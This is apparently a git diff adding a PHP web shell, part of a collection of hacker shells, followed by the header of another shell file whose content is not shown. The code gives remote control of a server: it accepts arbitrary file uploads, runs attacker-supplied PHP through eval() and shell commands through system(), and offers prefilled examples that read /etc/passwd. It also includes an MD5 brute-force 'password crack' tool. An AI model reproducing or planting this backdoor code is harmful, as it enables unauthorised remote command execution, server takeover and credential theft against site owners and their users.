+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newfile_submit 1");
+   if (!isset($df3)) exit("err# newfile_submit 2");
+
+   $fname="";
+   if (isset($df2)) { 
+      if (!preg_match("~([^/]+)$~",$HTTP_POST_FILES['userfile']['name'],$ok)) {
+         exit("Upload failed: can't detect file name");
+      }
+      $fname=$ok[1];
+   }
+   else {
+      $fname=$df3;
+   }
+   if ($fname=="") 
+     exit("".mm("You mast checked 'create file name automatic' OR typed file name!").""); 
+   if (isset($df4)) $fname=strtolower($fname);
+
+   echo "Temp file: ".$HTTP_POST_FILES['userfile']['tmp_name']."<br>";
+   echo "Origin file name: ".$HTTP_POST_FILES['userfile']['name']."<br>";
+   echo "File size: ".$HTTP_POST_FILES['userfile']['size']."<br>";
+   if ($df[strlen($df)-1]!="/") $df.="/";
+   echo "".mm("SAVING TO").": <font color=blue>$df</font><font color=red><b>$fname</b></font><p>";
+
+   ob();
+   $ok=copy($HTTP_POST_FILES['userfile']['tmp_name'],"$df$fname");
+   obb();
+   if (!$ok) exit("<font color=red><b>".mm("Sorry, access denied")."</b></font> $obb");
+
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>NEW FILE SAVED</a>";
+  
+   break;
+
+
+case "newdir_submit": 
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newdir_submit 1");
+   ob();
+   if (!mkdir($df,$mkdir_mode)) {
+      obb();
+      exit("Access denied $obb");
+   }
+   obb();
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>Go to new directory!</a>";
+
+   break;
+
+
+case "t": 
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+
+   if (!$write_access) exitw();
+   error_reporting(2038);
+
+   if (!isset($php)) {
+      $php="/* line 1 */\n\n// ".mm("for example, uncomment next line").":\nphpinfo();\n\n//readfile(\"/etc/passwd\");\n\n/* line 8 */";
+      $skipphp=1;
+      $pre='checked';
+      $nlbr='';
+      $xmp='';
+      $htmls='checked';
+   } 
+
+   echo "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"&lt;?\" ".mm("and")." \"?&gt;\")
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=php rows=".(!isset($skipphp)?10:4)." cols=60 style='width:100%;'>$php</textarea>
+<input type=checkbox name=pre value='checked' $pre id='pre'>
+   <label for='pre'> add &lt;pre&gt;</label> &nbsp;
+<input type=checkbox name=xmp value='checked' $xmp id='xmp'>
+   <label for='xmp'> add &lt;xmp&gt;</label> &nbsp;
+<input type=checkbox name=htmls value='checked' $htmls id='htmls'>
+   <label for='htmls'> add htmlspecialchars()</label> &nbsp;
+<input type=checkbox name=nlbr value='checked' $nlbr id='nlbr'>
+   <label for='nlbr'> add nl2br()</label><br>
+<input type=submit></form>
+<P>";
+
+   if (!isset($shell)) $skipshell=1;
+
+   if (!isset($skipphp)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      if ($pre<>'') echo "<pre>";
+      if ($xmp<>'') echo "<xmp>";
+      if ($nlbr<>'' || $htmls<>'') {
+         ob_start();
+      }
+      if ($phpeval_access) eval($php);
+      else die("Sorry, function eval() disabled.");
+      if ($nlbr<>'' || $htmls<>'') {
+         $tmp=ob_get_contents();
+         ob_end_clean(); 
+         if ($htmls<>'') $tmp=htmlspecialchars($tmp);
+         if ($nlbr<>'') $tmp=nl2br($tmp);
+         echo $tmp;
+      }
+      if ($xmp<>'') echo "</xmp>";
+      if ($pre<>'') echo "</pre>";
+      echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      echo "</table></table></table></table></table></table></table></table></table></center></table><hr size=1 noshade>";
+   }
+
+   if (!isset($shell)) {
+      $shell="#".mm("example (remove comments '#')").": \n\n#cat /etc/passwd;\n\n#ps -ax\n\n#uname -a";
+      $skipshell=1;
+   }
+   echo "<P><b>".mm("Shell commands")."</b>
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=shell rows=".(!isset($skipshell)?10:4)." cols=60 style='width:100%;'>$shell</textarea><br>
+<input type=submit></form>
+<P>";
+   if (!isset($skipshell)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
+      if ($system_access) system($shell);
+      else die("Sorry, function system() disabled.");
+      echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
+      </table></table></table></table></table></table></table></table></table></center><hr size=1 noshade>";
+   }
+
+
+  $ttype=array(1=>"MD5",7=>"Decode MD5 (password crack)<br>",
+  2=>"Base64",3=>"Base64 + chunk",4=>"Base64 + chunk + quotes",
+  5=>"Decode Base64<br>",
+  6=>"UnixTime=>Date(".time().")",
+  8=>"MKtime: YYYY MM DD [hh [mm [ss]]]<br>",
+  9=>"Translit=&gt;RusText", 14=>"RusText=&gt;Translit<br>",
+  10=>"cp1251=&gt;koi8r",11=>"koi8r=&gt;cp1251",12=>"cp1251=&gt;mac",13=>"mac=&gt;cp1251",
+  15=>"koi8r=&gt;mac",16=>"mac=&gt;koi8r",
+  );
+  echo "<P><b>".mm("Universal convert")."</b>";
+
+  echo "<a name=convert></a><form action='$self#convert' method=post>";
+  foreach ($ttype as $k=>$v) 
+     echo "&nbsp;&nbsp;<nobr><input ".($k==$name?"checked":"")." type=radio name=name value=$k id=x$k><label for=x$k>$v</label></nobr> ";
+
+  echo "
+<input type=hidden name=c value=t>
+<textarea name=convert rows=".(isset($convert)?10:3)." cols=60 style='width:100%;'>".htmlspecialchars($convert)."</textarea><br>
+<input type=submit><br>";
+
+   
+   $russtr1="JCUKENGZH_FYVAPROLDESMIT_Bjcukengzh_fyvaproldesmit_b";
+   $russtr2="ÉÖÓÊÅÍÃÇÕÚÔÛÂÀÏÐÎËÄÝÑÌÈÒÜÁéöóêåíãçõúôûâàïðîëäýñìèòüá";
+   function from_translit($ss) {
+      global $russtr1,$russtr2;
+      $w=array("Sch",'Ù',"SCH",'Ù',"ScH",'Ù',"SCh",'Ù',"sch",'ù',"Jo",'¨',"JO",'¨',"jo",'¸',
+      "Zh",'Æ',"ZH",'Æ',"zh",'æ',"Ch",'×',"CH",'×',"ch",'÷',"Sh",'Ø',"SH",'Ø',"sh",'ø',
+      "##",'Ú',"''",'Ü',"Eh",'Ý',"EH",'Ý',"eh",'ý',"Ju",'Þ',"JU",'Þ',"ju",'þ',"Yu",'Þ',
+      "YU",'Þ',"yu",'þ',"YA","ß","Ya","ß","ya","ÿ","Ja",'ß',"JA",'ß',"ja",'ÿ');
+      $c=count($w);
+      for ($i=0; $i<$c; $i+=2) $ss=str_replace($w[$i],$w[$i+1],$ss);
+      $ss=strtr($ss,$russtr1,$russtr2);
+      $ss=preg_replace("!([à-ÿ]+)~([à-ÿ]+)!is","\\1\\2",$ss);
+      return $ss;
+   }
+   function to_translit($ss) {
+      global $russtr1,$russtr2;
+      $ss=strtr($ss,$russtr2,$russtr1);
+      $ss=str_replace(
+         array('Ø', 'Ù',  'Æ', 'ß', '×', 'Þ', '¨', 'ø', 'ù',  'æ', 'ÿ', '÷', 'þ', '¸', ),
+         array('SH','SCH','ZH','YA','CH','YU','YO','sh','sch','zh','ya','ch','yu','yo',),
+         $ss);
+      return $ss;
+   }
+   
+   if (isset($convert)) {
+      if (!isset($name)) $name="0";
+      $out="";
+      switch ($name) {
+
+         case 1: 
+            $out=md5($convert);
+            break;
+
+         case 2:
+            $out=base64_encode($convert);
+            break;
+
+         case 3:
+            $out=chunk_split(base64_encode($convert));
+            break;
+
+         case 4:
+            $out=base64_encode($convert);
+            $out=substr(preg_replace("!.{1,76}!","'\\0'.\n",$out),0,-2);
+            break;
+
+         case 5:
+            $out=base64_decode($convert);
+            break;
+
+         case 6:
+            $convert=intval($convert);
+            if ($convert==0) $convert=time();
+            $out="Unixtime=$convert\n---Day/Month/Year--\n".
+               date("d/m/Y H:i:s",$convert)."\n".
+               date("d-m-Y H:i:s",$convert)."\n".
+               date("d.m.Y H:i:s",$convert)."\n".
+             "---Month/Day/Year--\n".
+               date("m/d/Y H:i:s",$convert)."\n".
+               date("m-d-Y H:i:s",$convert)."\n".
+               date("m.d.Y H:i:s",$convert)."\n".
+             "---------SQL-------\n".
+               date("Y-m-d H:i:s",$convert)."\n".
+               date("Y m d H i s",$convert)."\n".
+               date("YmdHis",$convert);
+            break;
+
+         case 8:
+            $c=explode(" ",trim(preg_replace("! +!"," ",$convert)));
+            if (count($c)<3 || count($c)>6) $out="Bad value. Type: 2000 12 31 or 2000 12 31 12 59 59";
+            else {
+               if (empty($c[0])) $c[0]=1970;
+               if ($c[0]<50) $c[0]=2000+$c[0];
+               if ($c[0]>50 && $c[0]<100) $c[0]=1900+$c[0];
+               if (empty($c[1])) $c[1]=1;
+               if (empty($c[2])) $c[2]=1;
+               if (empty($c[3])) $c[3]=0;
+               if (empty($c[4])) $c[4]=0;
+               if (empty($c[5])) $c[5]=0;
+               $out="TIME: $c[0]-$c[1]-$c[2] $c[3]:$c[4]:$c[5]\nMKTIME: ".mktime($c[3],$c[4],$c[5],$c[1],$c[2],$c[0]);
+            }
+            break;
+
+         case 9:
+            $out=from_translit($convert);
+            break;
+
+         case 14:
+            $out=to_translit($convert);
+            break;
+
+         case 10: $out=convert_cyr_string($convert,'w','k'); break;
+         case 11: $out=convert_cyr_string($convert,'k','w'); break;
+         case 12: $out=convert_cyr_string($convert,'w','m'); break;
+         case 13: $out=convert_cyr_string($convert,'m','w'); break;
+         case 15: $out=convert_cyr_string($convert,'k','m'); break;
+         case 16: $out=convert_cyr_string($convert,'m','k'); break;
+
+         case 7:
+            echo "<script>top.location.href='$self?c=md5crack&text=$convert'</script>";
+            break;
+
+         case 0:
+            $out="Please select anythink function in list. Example: type 'test' and select 'md5'. Then click 'Submit'.";
+            break;
+
+         default: 
+            $out='Sorry, this function not work (try new versions)';
+      }
+      echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<pre><xmp>$out</xmp></pre>\n\n\n\n\n\n\n\n\n<hr size=1 noshade>";
+   }
+   
+   break;
+
+
+case "md5crack":
+
+   echo "<form action=$self name=main><input type=hidden name=c value=md5crack>
+   <h2>Decode MD5 (<a href=$self>home</a>|<a href=$self?c=t&name=1#convert>md5</a>)</h2><P>";
+
+   if (!isset($go)) {
+      if (!isset($fullqty)) $fullqty="";
+      if (!isset($fulltime)) $fulltime="";
+      if (!isset($php)) $php="";
+      if (!isset($from)) $from="";
+      echo "<b>STRING</b>: <input type=text name=text value='$text' size=40> (only 32 char: 0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f)";
+      echo "<P><b>Range</b>: <input type=text name=php value=\"".htmlspecialchars($php)."\" size=90><br>";
+      $chars=array(
+      'a-z'=>"abcdefghijklmnopqrstuvwxyz",
+      'a-z,A-Z'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",
+      'a-z,0-9'=>"abcdefghijklmnopqrstuvwxyz0123456789",
+      'a-z,A-Z,0-9'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
+      'a-z,A-Z,0-9,other'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~`!@#\$%^&*()_+-=[]{};:,<.>/\"'\\");
+      $i=0;
+      foreach ($chars as $k=>$v) {
+         echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\",$v))."\"</script>
+         <a href='' onclick=\"document.main.php.value=str$i;return false\">$k</a> &nbsp; ";
+         $i++;
+      }
+      echo "<P>
+      <b>Start from</b>: <input type=text size=70 name=from value='$from'><P>
+      <input type=hidden name=go value=1>
+      <input type=hidden name=fullqty value=$fullqty>
+      <input type=hidden name=fulltime value=$fulltime>
+      <input type=submit value='Start!'><form>";
+   }
+   else {
+
+      function mdgetword() {
+         global $php,$from,$word;
+         $word="";
+         for ($i=0; $i<count($from); $i++) $word.=$php[$from[$i]];
+      }
+
+      $fulltime=@intval($fulltime);
+      $fullqty=@intval($fullqty);
+
+      $text=strtolower($text);
+      if (!preg_match("!^[0-9a-f]{32}$!",$text)) exit("md5 bad format: must be 32 bytes, range 0-9,a,b,c,d,e,f");
+      if (!isset($php) || strlen($php)==0) $php="qwertyuiopasdfghjklzxcvbnm";
+      if (!isset($from) || !preg_match("!^([0-9]+):(([0-9]+,)*[0-9]+)$!",$from,$ok)) {
+         $pos=0;
+         $from=0;
+      }
+      else {
+         $pos=$ok[1];
+         $from=$ok[2];
+      }
+      $from=explode(",",$from);
+      if (!is_array($from) || !count($from) || count($from)==1 && $from[0]==0) { 
+         $from=array(0);
+         if (md5("")===$text) exit("** DONE **<br><br>md5('')=$text<br><br>(try empty string, 0 bytes!)");
+      }
+      $phplen=strlen($php);
+      mdgetword();
+      $poslen=strlen($word);
+      if ($pos<0 || $pos>=$poslen) $pos=0;
+
+      for ($i=0; $i<10; $i++) { echo "<!-- -->\r\n"; flush(); }
+
+      echo "<h3><a href='$self?c=md5crack".
+         "&from=".urlencode("$pos:".implode(",",$from)).
+         "&text=".urlencode($text).
+         "&php=".urlencode($php).
+         "&fulltime=$fulltime&fullqty=$fullqty".
+         "'>Save this link</a> - click for break and save current position</h3>";
+      flush();
+
+      echo "
+      MD5_HASH=$text<br>
+      CURRENT_WORD=$word<br>
+      CURRENT_DIGIT=$pos:".implode(",",$from)."<br>
+      RANGE=".htmlspecialchars($php)."<br>
+      ProcessTime=$fulltime sec (".(floor($fulltime/60/60))."h)<br>
+      Calculation(qty)={$fullqty}0000<p><font face=courier>";
+      flush();
+
+
+      $fullsum=pow($phplen,$poslen);
+      $time1=time();
+      $i=0;
+
+      while (1) {
+
+         $i++;
+         if ($i>50000) {
+            $time=time()-$time1;
+            if ($time>20) break;
+            $i=0;
+            $sum=0;
+            for ($j=1; $j<count($from); $j++) $sum+=$from[$j]*pow($phplen,$j);
+            printf("<nobr><b>%02.2f%%</b> ($word) %02dsec |</nobr> \r\n",
+               $sum*100/$fullsum,$time);
+            flush();
+            $fullqty+=5;
+         }
+
+         if (md5($word)===$text) 
+            exit("<P><font color=red size=+1><b>** DONE **<P><tt>[$word]=[$text]</tt></b></font>
+            <script> window.focus();  window.focus(); setTimeout(\"alert('Done!')\",100);</script>");
+         $from[$pos]++;
+         if ($from[$pos]==$phplen) {
+            $flag=1;
+            $from[$pos]=0;
+            $word[$pos]=$php[0];
+            for ($pos=$pos+1; $pos<$poslen; $pos++) {
+               if ($from[$pos]+1<$phplen) {
+                  $from[$pos]++;
+                  $word[$pos]=$php[$from[$pos]];
+                  $flag=0;
+                  $pos=0;
+                  break;
+               }
+               else {
+                  $from[$pos]=0;
+                  $word[$pos]=$php[0];
+               }
+            }
+            if ($flag) {
+               $from[]=0;
+               $poslen=count($from);
+               $word.=$php[0];
+               $pos=0;
+               $fullsum=pow($phplen,$poslen);
+            }
+         }
+         $word[$pos]=$php[$from[$pos]];
+      }
+
+      $fulltime+=time()-$time1;
+      if ($i>5000) $fullqty++;
+      $url="$self?c=md5crack".
+           "&from=".urlencode("$pos:".implode(",",$from)).
+           "&text=".urlencode($text).
+           "&php=".urlencode($php).
+           "&fulltime=$fulltime&fullqty=$fullqty&go=1";
+      echo "<script>location.href=\"$url\"</script><a href='$url'>click here</a>";
+
+   }
+
+   break;
+
+
+case "phpinfo":
+
+   phpinfo();
+   break;
+
+
+case "codes":
+
+   error_reporting(2039);
+   if (!isset($limit)) $limit=999;
+   if (!isset($fontsize)) $fontsize="300%";
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+   echo "<h3>".mm("Character map (symbol codes table)")."</h3>
+   <form action=$self method=get>
+   <input type=hidden name=c value=\"codes\">
+   <select name=fontname size=1>
+   <option value='Webdings'>====[ ".mm("Select font")." ]====";
+
+   foreach (array('Arial','Courier','Comic Sans MS','Fixedsys','Small fonts','Symbol',
+      'System','Tahoma','Terminal','Times New Roman','Verdana',
+      'Webdings','Wingdings','Wingdings 2','Wingdings 3') as $v)
+      echo "<option".($fontname==$v?" selected":"").">$v";
+   
+   echo "</select>
+   ".mm("or type other")." 
+   <input size=13 type=text name=fontname2 value=\"$fontname2\">.
+   ".mm("Font size").": <input size=6 type=text name=fontsize value=\"$fontsize\">.<br>
+   ".mm("Code limit").": 
+   <input type=radio name=limit value=255 id=a1 ".($limit==255?"checked":"")."><label for=a1>0-255</label>
+   <input type=radio name=limit value=999 id=a2 ".($limit==999?"checked":"")."><label for=a2>0-999 </label>
+   <input type=radio name=limit value=9999 id=a3 ".($limit==9999?"checked":"")."><label for=a3>0-9999</label>
+   <input type=submit value='".mm("Generate table")." !'></form><P>";
+
+   if (!isset($fontname)) break; 
+   if (!empty($fontname2)) $fontname=$fontname2;
+   echo "
+   <STYLE>
+   .codes { font: $fontsize $fontname; text-align: center; }
+   .z { font: 12pt Fixedsys; color: #cccccc; }
+   </STYLE>
+   <table class=codes border=0 cellspacing=0 cellpadding=1>";
+   ?>
+   <SCRIPT>
+   m=8;
+   n=1;
+   s=new String("");
+   s=s+"<tr><td class=z>&amp;#0000;</td><td>&nbsp;</td>";
+   for (i=1; i<=<?php echo $limit; ?>; i++) {
+      if (i<10) x="000"+i;
+      else if (i<100) x="00"+i;
+           else if (i<1000) x="0"+i;
+                else x=i;
+      if (n%m==0) s=s+"<tr>";
+      s=s+"<td class=z>&amp;#"+x+";</td>";
+      s=s+"<td>&#"+x+";</td>";
+      if (n%m+1==m) s=s+"</tr>";
+      if (s.length>500) {
+         document.write(s);
+         s=""
+      } 
+      n++;
+   }
+   document.write(s);
+   </SCRIPT>
+   <?php
+
+   echo "</table>";
+   break;
+
+
+
+case "img":
+
+   unset($img);
+$img=array(
+'dir'=>
+'R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp'.
+'/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=',
+'fon'=>
+'R0lGODlhQAYEALMAAAAAAP///6bK8A4obRs2eSlFhDZTkEVjnVRyqWKCtnCQwXyezIiq1pO24J3A'.
+'6P///yH5BAEAAA8ALAAAAABABgQAAAT/cMhJq704E7n78EQXjmRpnmcRqizRsgUcz3Rt37QR63zR'.
+'GzygcEgsGo8HYNKQbDKfh2Z0Sq1ar9goQsvdeg/eMGJMLpvPaHRivG4j3O14Yk6v2+/4u2K+7yf8'.
+'Cn2Bg4SFhoeGC4GKjAqNC4yQkpOUlZaTDJCZmwubngygoaKjpKUNDKepqKipDa6vsLGysg4Ntbe2'.
+'tg63u72+v8AOArvDxcLFAsnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx'.
+'8vPSGfb3GCAfHBP6IvwgRKBIscJFwREvXMRYkVCGQhw1dPiYSJHiDx8SLwLBeKSjkyUg/5VAGRnl'.
+'CUkmWVKCWfmF5UqXX8bAZJmmJpubbt6QWaNzTs+ccOTkwbPnj9GjfIwCKspUqSBEiRxJnbpI6qNG'.
+'Vh1d2sopUydNYEF18tp1bClTq06JUqvK1aq0rGbNwvUKl11deIP9Mkasr7Fkwo4do0e4sOHDiBMr'.
+'Xsy4sePHkCNLnkzZHL7LmC9s2LdZ34eAAkOjUGGCNAyEBhkqfDiDNcTXGS1O7IFx9sYhHDuKRCIy'.
+'pBSSUqgAV7kFS/GXMcHIXK6cDEybOm+e4emzp/Wgdd7E0T50aNNAdADxeTroT3moVQspWrT+0dRI'.
+'k7Ju/VrJK/2ynsyG+nr2LSlVrMCVlsIsA8pVCyx05bJLXrzoFQxff0WITGUUVmjhhRhmqOGGHHbo'.
+'4YcgepPZiP3wA9A+nJ0o0GchsDjQiwaRFiNCL7R2Wo2vRZRDRbJpdJsQueWm2xImfdTbbkYKNwUU'.
+'KjXp0pPMJScGTdBVeZ10V2J3XXdEJaWUHUWZ9yV4ZDqFHnrrZVWVe5VYNZ8l9pF1H3/87ddVf6Oo'.
+'JSCAcMHSp1wGKujKXQsGo8uDvgwTWGCKKjMYYCFGKumklFZq6aWYZqrppstEAAA7',
+'mode'=>
+'R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO'.
+'2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/'.
+'dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=',
+
+'refresh'=>
+'R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA'.
+'AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY'.
+'3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ'.
+'R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=',
+'search'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//'.
+'/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap'.
+'s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD'.
+'AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr'.
+'Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==',
+'setup'=>
+'R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC'.
+'QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA'.
+'ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB'.
+'qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE'.
+'OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==',
+'up'=>
+'R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg'.
+'+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV'.
+'IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==',
+'sort_asc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa'.
+'SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==',
+'sort_desc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb'.
+'SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=',
+'exe'=>
+'R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7'.
+'WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt'.
+'xhIAOw==',
+'html'=>
+'R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz'.
+'c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P'.
+'KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk'.
+'Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR'.
+'ADs=',
+'txt'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ'.
+'SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7'.
+'UpPWG3Ig6Hq/XmRjuZwkAAA7',
+'unk'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANE'.
+'SLPcSzCqQKsVQ8JhexBBJnGVYFZACowleJZrRH7lFW8eDbMXaPO1juA2uXiGwBwFKRMeiTPlByrd'.
+'yUzYbJao6npVkQQAOw==',
+'php'=>
+'R0lGODlhEwAQALMAAAAAAP///9fX3d3f7s/S5F1qpmJpjKOqyr7D27i80K+ywEtam4OIk+T/AO7u'.
+'7v///yH5BAEAAA8ALAAAAAATABAAAAR08D0wK71VSna47yBHadxhnujRqKRJvC+SJIPKbgJR7DzP'.
+'NECNgNFbGI/HhmZQWASezugzsFBKdtJsoEA1aLBTJzTMIDWpRqr6mFgyounswiAgDYjY/FwxGD1K'.
+'BAMIg4MJCg41fiUpjAeKjY1+EwCUlZaVGhEAOw==',
+'img'=>
+'R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV'.
+'Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp'.
+'qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq'.
+'BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==',
+'edit'=>
+'R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze'.
+'EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61'.
+'LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==',
+'papki'=>
+'R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo'.
+'eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD'.
+'Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==',
+'home'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS'.
+'krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j'.
+'VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=',
+'back'=>
+'R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8'.
+'aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt'.
+'Wg0JADs='
+
+);
+
+
+   header("Content-type: image/gif");
+   header("Cache-control: public");
+   // /*
+   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+   header("Cache-control: max-age=".(60*60*24*7));
+   header("Last-Modified: ".date("r",filemtime(__FILE__)));
+   // */
+   echo base64_decode($img[$name]);
+
+   break;
+
+}
+
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Private-i3lue.php.txt b/xakep-shells/PHP/Private-i3lue.php.txt
new file mode 100644
index 0000000..93abbae
--- /dev/null
+++ b/xakep-shells/PHP/Private-i3lue.php.txt
@@ -0,0 +1,1456 @@
